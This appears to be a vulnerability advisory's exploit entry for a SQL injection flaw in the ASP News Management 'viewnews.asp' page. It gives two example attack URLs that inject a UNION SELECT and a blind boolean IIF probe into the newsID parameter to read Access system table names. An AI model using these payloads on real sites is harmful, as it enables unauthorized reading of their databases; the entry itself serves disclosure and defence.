ASP News Management 'viewnews.asp' SQL Injection Vulnerability

info
discussion
exploit
solution
references

ASP News Management 'viewnews.asp' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/aspnews/viewnews.asp?newsID=8+union+select+name+from+msysobjects
http://www.example.com/aspnews/viewnews.asp?newsID=IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Name%20from%20MSysObjects))='a',0,'Bingo')%00